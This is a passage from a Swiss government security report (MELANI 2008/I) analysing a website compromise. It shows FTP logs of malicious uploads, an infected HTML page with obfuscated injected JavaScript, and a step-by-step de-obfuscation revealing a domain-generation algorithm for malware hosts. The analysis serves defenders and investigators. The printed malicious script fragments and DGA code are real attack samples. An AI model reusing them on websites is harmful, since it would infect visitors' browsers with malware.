manipulations are either carried out manually by the attacker or automatically by a bot.

The following excerpt (Illustration 1) of FTP log files illustrates such an attack. The analysis
shows that not only one, but even three uploads of malicious components took place, namely
on 4 March 2008, 20 March 2008, and 28 April 2008. The IP addresses in this case were
registered in Canada and the United States. This was most probably an automated attack.
The IP addresses only refer to proxy or botnet computers and not the attackers themselves.

2008-03-04 11:49:42 68.148.9.86 xyz 21 [24236]USER xyz 331 0 0 0
2008-03-04 11:49:42 68.148.9.86 xyz 21 [24236]PASS - 230 0 0 15
2008-03-04 11:49:53 68.148.9.86 xyz 21 [24236]sent /xyz/index.html 426 0 0 110
2008-03-04 11:49:53 68.148.9.86 xyz 21 [24236]sent /xyz/index.html 226 588 0 1031
                                                                                                   41/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

2008-03-04 11:50:20 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 426 0 0 125
2008-03-04 11:50:20 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 963 0 953
2008-03-04 11:50:33 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 0 0 0
2008-03-04 11:50:33 68.148.9.86 xyz 21 [24236]sent /xyz/Main_Frame.htm 226 0 0 0
2008-03-04 11:50:36 68.148.9.86 xyz 21 [24236]created Main_Frame.htm 226 0 4127 1844
2008-03-20 07:52:01 74.138.129.195 xyz 21 [45992]USER xyz 331 0 0 0 - -
2008-03-20 07:52:05 74.138.129.195 xyz 21 [45992]PASS - 230 0 0 16 - -
2008-03-20 07:52:38 74.138.129.195 xyz 21 [45992]sent /xyz/index.html 226 588 0 172 - -
2008-03-20 07:52:50 74.138.129.195 xyz 21 [45992]sent /xyz/Left_Frame.htm 226 5875 0
328 - -
2008-03-20 07:53:07 74.138.129.195 xyz 21 [45992]created Left_Frame.htm 226 0 6975
3515 - -
2008-04-28 07:43:30 24.127.176.63 xyz 21 [19408]USER xyz 331 0 0 0 - -
2008-04-28 07:43:34 24.127.176.63 xyz 21 [19408]PASS - 230 0 0 16 - -
2008-04-28 07:44:06 24.127.176.63 xyz 21 [19408]sent /xyz/index.html 226 588 0 109 - -
2008-04-28 07:44:20 24.127.176.63 xyz 21 [19408]sent /xyz/Left_Frame.htm 226 3687 0
234 - -
2008-04-28 07:44:37 24.127.176.63 xyz 21 [19408]created Left_Frame.htm 226 0 6971 3359
--
Illustration 1: Excerpt of the FTP log files of a compromised server



The injected code

To make the analysis more difficult, the injected code in this example was written in such a
complicated way that it was very hard to understand, but still functioned (obfuscation). To
analyze the code, it must therefore be brought into an understandable form (de-obfuscation).
While this method of obfuscation is also used by JavaScript programmers to protect their
intellectual property, it is clearly used in this example to prevent administrators and
investigators from understanding the full functionality of the code. In Illustration 2, the original
HTML code is marked green and the added code red. This added code consists of a very
long JavaScript string: $=“[…]”. To illustrate this better, line breaks were included in
Illustration 2. This string is “unescaped” (decompressed) in the final line and the results
passed on to the “document.write” method, which then passes the code on to the web
browser for execution. In plain text, the only code one sees is:

eval(unescape($));document.write($);

For those websites with little or no JavaScript, such code fragments may suffice as a warning
sign. For more complex websites, however, such code may no longer be conspicuous. Since
the entire JavaScript code is contained in a single long line, it is often only recognized by
webmasters once a visitor has reported an infection.



<html>
<head>
<title>Widgets Info Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head>

<body bgcolor="#000000" background="Images/Top_Widget.jpg">
<div align="center">
  <p><img src="Images/Left_Widget.jpg" width="680" height="444" usemap="#Map2" border="0">
    <map name="Map2">
     <area shape="rect" coords="2,1,677,447" href="Frame_Left.htm" target="_self">
    </map>
    <br>
    <map name="Map">
     <area shape="rect" coords="5,6,397,511" href=Description_Main.htm" target="_self" alt="Description of Widgets"
title="Description of Widgets">
                                                                                                                      42/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

   </map>
  </p>
  <p><font face="Garamond" size="4"><b>Widget Overview</b></font></p>
  <p><b><font face="Garamond" size="4">Super New Widgets </font></b></p>
  <p>&nbsp; </p>
</div>
<script language="javascript">$="%63a%3d%22%2566u%256ectiax%256fn %2564c%2573(%2564s,e%2573){d %2573%253
du%256 ee%2573c%25ae61p%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7% 3c7tfu7%3 c7dxb7%3c7v yb7%3c7fy v7%3 c7
huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi 87q7%3c7 r7 %3c7s7%3c7t 7%3 c7u7
%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7| 7%we3c7}7%3c7~7 %3c7%257F7%3c7`7%3c 7a7%3qc7b7% 3c7c7%
3c7%2 2;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%25u22%2520%2520%279kd)K7di7M0-0%2522%2520%2520%27+m}^}-
S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888 d)K7i7 M6% 2520hQQ9;}^}9 50&5##95 0%2522&M+ iSx%2522|)K88 88d
)K7i7 M6 %2520h##!!9..#9;}^}950!%25209M +}Sa x%22;d c%3d%220 d)K7t 7M-t)%3ewudTqdu 89%3d8t)% 3ewudT qi899+yv8
d)K7t7M,%25209d)K7t7M-!+d) K7}7Mt )%3ewu d]%257F~d x89;!+ ve~ sdy %a 257F ~0S]^8t%3c}%3ci9kfqb0b-888i;8 #:t99;8}
Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%x3 257Fh% 3es%25 7F}7+f qb0iSx !%3ciSx %2522 %3c%22;de%3d%22-|)K88d) K7}7M;}^
}950%2522%259M+yv888d)K7t7 M:%25229.-%25209 6688d) K7t7M: %25229,-)99tSx-~)K8d)K7t7M50!%25209M54+u|cu0tSx-
|)K88d)K7t7M:&950%2522%279M+4-%3eb u`|qsu8t% 3ciSx%2522; }Sx w;iSx!;tSx;})Kd)K7} 7M%3d! M;7%3 es%257F }79+%2
2;cb% 3d% 22e(%2564s)%2 53bs t%253dt %256d %2570% 253d%252 7% 2527 ;for(i% 253d0;i%2 53cds.% 256caden% 22;d
z3d%22%2566u%256e%2563tioax%256e %2564 w%e252 8t){% 2563 a%2 53d %25 27%252564%2525 6f%252563u me%25
256et.%252577r%2569t%252565(%2525 22%25 27;c e%2 53d%2 527%252 522) %2 527;cb 253d%25 27%25253c scr%2525
69%252570t%25256ca%25256%2565g%25257%2535a%25256%2537e%25253d%25255c%2525%25322%256aa%2576a%2
52573c%2572%2569%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252fscrip%2574%2
5253e%2527;eval%2528une%2573ca%2570%2565(t%2529%2529%257d;%22;cd%3d%223ds%2574%252b%2553%2574rin
%2567.fr%256f%256dC%2568%2561rCo%2564e(%2528%2574mp.%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gf
w)6|``d.;;bqgx{l:w{y;xp;sfs;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;st%3d%22%2573t%253d%2522%253dst%253b%2564c
%2573(%2564%2561%252b%2564b%252b%2564%2563%252b%2564d%252b%2564e%252c1%2530)%253b%2564%2577(
%2573%2574)%253b%2573%2574%253d$%253b%2522%253b%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3
c7j79+fqb0~)-ug0Qbbqi8!%3c%2522%3c#%3 c$% 3c%25%3 c&%3c%2 7%3c (%3c) 9+fq b0d)-~ug0Qbbqi89+fqb0t)-~ug0 Tq
du8 9+d)K7i7Ma-t)%3ewudVe||Iuqb89+yv8t) %3ewu dTqi89.#9d) K7t7M-)%3 ewudTqd u8 9% 3d8t)% 3ewudTqi 89;% 25229 +
u|c u% 22;ce%3 d%22%2563har%2543o%256 4eA%2574( %25 30)^% 2528 %252 70%2 578%2 5300%2 527+e s))% 2tzr529
;}}%22;cc%3d%22%2567th;%2569++%2529{tm%2570%253dds.sl%2569c%2565(%2569,i%252b1%2529;s%2574%25%22;op
%3d%22%2524%253d%2522%2564w(%2564cs%2528cu,%25314)%2529;%2522;%22;cz%3d%22%2566%2575n%2563ti%25
6f%256ecz%2528c%257a){%2572et%2575rn%2520c%2561%252bcb+%2563%2563+%2563d+c%2565c%257a;}%253b%22;
%69%66(d%6fc%75%6den%74.%63o%6fki%65.%69nd%65xO%66%28%27vbul%6c%65%74in_%6dult%69qu%6fte%3d%27)
%3d%3d){sc(%27vbu%6c%6ce%74i%6e%5fnbmul%74iq%75ot%65%3d%27,%3 2,7)% 3b%aw65 va%6c(% 75nes%63ape%2
8dz+%63z+ %6fp%2b%73%74)a+%27d%77(d%7a+cz %28$+%73dt) %29%3b%2 7,3)} el%7 3e{%2 4%3d %27 %27} ;function
%20%73c(c%6em.-%2c%76,,eed%29%7bvar%20ex%64%3dnew %44at% 65();%6 5xd.a% 73 %65t D%61 t%6 55q(ex %64.%
67%65t%44a%74e()%2be%64)%3bdo%63ume%6et.%63oo%6bie%3dcnm%2b %27%3d%27aeesca% 70e(v w%29+ % 27%3
                                                                               ^~
beaer43gfhsrmx%70ire%73%3sd%27+exd.to§%12GM%5afuqq%34%58 5wtz-4 wa4Str%69ng%28)%3b%7d;
";eval(unescape($));document.write($);</script></body>
</html>



Illustration 2: Excerpt: HTML code and JavaScript exploit


The actual malware is not directly stored in these data; instead, the data contains browser
instructions to obtain the malware from another server controlled by the criminals. The
attackers use a hidden HTML IFrame tag (see Illustration 1) for this purpose. The DNS name
of the location of this file is generated automatically and changed twice a week. In the
example in Illustration 3 below, this is http://annvxes.com. In this way, the malware can be
stored centrally in one or few locations, while the distribution takes place decentrally through
numerous compromised websites. From the viewpoint of the criminals, this approach
increases flexibility, simplifies maintenance, and lowers the risk of discovery. Moreover,
additional filters for distributing the malware can be implemented in these central distribution
sites, e.g. to limit the infection to specific countries, to service the systems only once with
malware, or to mask certain IP address ranges.




Illustration 3: A hidden IFrame initiates download of the malware


                                                                                                                    43/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

The JavaScript code also transmits information about the browser version and plug-ins
(Acrobat, Flash, etc.) used, upon which the server sends back a tailored malware for
execution.

One special feature in this script is the variation of the domain depending on the date.
Illustration 4 shows the section of the de-obfuscated JavaScript code that creates the domain
names. The t9 arrays are used to encode the date, which are then processed through the
variables yCh2 (from the year), mCh (from the month), yCh1 (from the year again), dCh
(from the week day), m9 (three letter form for the month) to create the name, with “.com”
added to the end. Using this algorithm it is possible to calculate the names in advance. One
sees, for instance, that all DNS names in the month of June end in *xes.com (see script
sections in boldface).


var m9=new Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');
var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
var n9=new Array(1,2,3,4,5,6,7,8,9);
var t9=new Array();
var d9=new Date();
t9['y']=d9.getFullYear();
if(d9.getDay()>3)
    t9['d']=d9.getDate()-(d9.getDay()+2);
else
    t9['d']=d9.getDate()-(d9.getDay());
if(t9['d']<0)
    t9['d']=1;
t9['m']=d9.getMonth()+1;


function CMN(d,m,y)
{
    var r=(((y+(3*d))+(m^d)*3)+d);return r; }


var d='veslox.com';
var yCh1,yCh2,mCh,dCh,mNm;
if(t9['y']<2007)
    {t9['y'] = 2007;}
mNm=CMN(t9['d'],t9['m'],t9['y']);
yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)% 26]; yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)]; mCh=l9[((t9['m']+mNm)% 25)];
if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))
    dCh=n9[(t9['d']% 10)];
else
    dCh=l9[((t9['d']*6)% 27)];
$=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');




Illustration 4: Section of de-obfuscated JavaScript code that creates the domain name




This is an example of advanced malware requiring great obfuscation effort to make analysis
more difficult. The simplest method consists in starting the malware on a dedicated system
and observing it. To understand the malware in depth, however, and to reconstruct the
algorithm, reverse code engineering is required.


                                                                                                                             44/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally


Example: Analysis with the help of Malzilla 36




The script is sent to the decoder and, after several manual corrections (href.location and
callee string) executed in the emulator; the eval results can then be double-clicked:




36
     This analysis was carried out by Adrian Leuenberger from Compass Security.
                                                                                             45/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally




The deciphered code at the first level appears in the bottom window and is copied using
Copy6Paste into a new source window (for illustrative purposes here somewhat unformatted,
which is however not necessary):




                                                                                            46/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

The cookie-relevant queries are removed manually, since they would not work in the
emulation:




The script is executed again, and the following code is generated:




Double clicks on the 4 elements ultimately reveal several code fragments:

A)
function dw(t){ca='%64%6f%63ume%6et.%77rit%65(%22';ce='%22)';cb='%3cscr%69%70t
%6ca%6eg%75a%67e%3d%5c%22java%73cri%70t%5c%22%3e';cc='%3c%5c%2fscript%3e';eval(unescape(t))}
;function cz(cz){return
ca+cb+cc+cd+ce+cz;};$="dw(dcs(cu,14));";st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;";dw(dz+
cz($+st));



B) (almost identical to A, but decoded further)
function dw(t){ca='%64%6f%63ume%6et.%77rit%65(%22';ce='%22)';cb='%3cscr%69%70t
%6ca%6eg%75a%67e%3d%5c%22java%73cri%70t%5c%22%3e';cc='%3c%5c%2fscript%3e';eval(unescape(t))}
;function
dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.length;i++){tmp=ds.slice(i,i+1);st=st+Stri
ng.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}dw(dcs(cu,14));$=st;dcs(da+db+dc+dd+de,10
);dw(st);st=$


C)
undefined


                                                                                               47/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

D)
var m9=new
Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');var l9=new
Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v
','w','x','y','z');var n9=new Array(1,2,3,4,5,6,7,8,9);var t9=new Array();var d9=new
Date();t9['y']=d9.getFullYear();if(d9.getDay()>3)t9['d']=d9.getDate()-(d9.getDay()+2);else
t9['d']=d9.getDate()-(d9.getDay());if(t9['d']<0)t9['d']=1;t9['m']=d9.getMonth()+1;function
CMN(d,m,y){var r=(((y+(3*d))+(m^d)*3)+d);return r;}var d='veslox.com';va
yCh1,yCh2,mCh,dCh,mNm;if(t9['y']<2007){t9['y'] =
2007;}mNm=CMN(t9['d'],t9['m'],t9['y']);yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)%
26];yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)];mCh=l9[((t9['m']+mNm)
25)];if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))dCh=n9[(t9['d']% 10)];else dCh=l9[((t9['d']*6)%
27)];$=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com')


The last part is the most interesting. After reformatting, the ultimately used, de-obfuscated
JavaScript code to generate the dynamic DNS name appears (some comments were
inserted manually):




                                                                                                48/48


MELANI – Semi-annual report 2008/I